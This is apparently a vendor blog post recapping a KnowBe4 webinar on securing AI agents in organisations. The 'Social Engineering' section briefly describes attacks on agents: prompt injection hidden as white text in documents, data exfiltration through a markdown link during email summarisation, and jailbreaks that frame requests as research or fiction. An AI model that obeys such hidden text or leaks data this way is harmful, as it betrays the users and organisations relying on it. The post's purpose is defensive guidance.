The era of "typing into a box" is over. For years, we viewed artificial intelligence as a digital assistant—a sophisticated autocomplete tool that waited for human input. But according to Martin Kraemer, KnowBe4’s CISO Advisor for Europe and the Middle East, that dynamic has shifted. We have moved from asking AI questions to giving AI jobs.
In a recent deep-dive webinar, Martin explored the transition from AI tools to AI agents. These agents don’t just suggest text; they read emails, query proprietary documents, book meetings, and even write code—often without a human watching every step.
"AI has really become our digital colleague," Martin notes. "And that is the unique angle we are looking at: the hybrid workforce where humans and AI agents work side by side."
As these agents integrate deeper into our workflows, they bring a new set of security challenges that traditional perimeters aren't equipped to handle. Here are the key takeaways from Martin’s session on securing AI adoption.
The Four Traits Your AI Agent Shares With Your Staff
To secure AI, we must first recognize that agents behave more like employees than software. Martin identified four traits that AI agents share with your human workforce:
- Access: Just like a human, an agent has credentials to access mailboxes, file shares, and code repositories.
- Judgment Calls: AI is non-deterministic. Ask it the same question twice, and you might get two different actions—much like a human colleague.
- Influence: Agents can be swayed by the information they consume, making them susceptible to a digital form of social engineering.
- Agency: They act on behalf of a user, often inheriting permissions that may exceed what is necessary for a specific task.
The "Confused Deputy:" Why Agents are Easier to Manipulate
The most striking difference between a human colleague and an AI agent is the lack of "gut feeling." A human might hesitate if a request feels "off," but an AI agent complies by default.
Martin highlighted that 73% of production AI deployments have an exploitable prompt injection vulnerability, yet only 33% of organizations have deployed dedicated defenses. This gap leads to what security experts call "Shadow AI"—where employees use unsanctioned tools, or vendors enable AI features by default without IT’s knowledge.
"We spent 20 years teaching humans not to trust every email they read, and now we’ve just deployed AI agents that do exactly that," says Martin.
Social Engineering: Now for Machines
The webinar detailed how the classic "ingredients" of social engineering—authority, urgency, and trust—are being repurposed to target AI:
- Indirect Prompt Injection: Hiding malicious instructions in a document (using white text on a white background) that the agent is asked to summarize. The human never sees it, but the agent follows it.
- The Echo Leak: A vulnerability where an agent, while summarizing a benign email, is tricked into exfiltrating data via a markdown link to an attacker’s domain.
- Context Manipulation: "Jailbreaking" an agent by framing a harmful request as "research" or "fiction" to bypass safety guardrails.
How to Onboard Your AI Safely
Security shouldn't be about saying "no"—it should be about "Yes, and here is how." Martin suggests a governance framework based on three categories: Sanctioned (Enterprise-grade with SSO), Guided (limited use cases), and Prohibited (consumer tools that train on your data).
To achieve "zero invisible AI risk," organizations should follow these steps:
- Create an Inventory: You cannot protect what you don't know exists. List every tool, agent, and integration.
- Apply "Least Privilege" by Task: Don't let an agent inherit a user's entire role; limit its access to the specific task at hand.
- Prompt Hygiene Training: Just as we train for phishing, we must train for prompt safety.
- Human-in-the-Loop: For sensitive actions, ensure a human is required to verify the agent's output.
Get the Full Picture
The webinar also featured a first look at KnowBe4’s Agent Risk Manager, a new tool designed to surface "Shadow AI" signals and detect risky agent behaviors like sensitive info disclosure and unbounded consumption.
Are you ready to start "onboarding" your AI agents with the same rigor you use for human hires? This session is a must-watch for any security leader navigating the "Wild West" of AI adoption.
Watch the full webinar here to see the live demos and learn how to close the gap between AI productivity and organizational security.
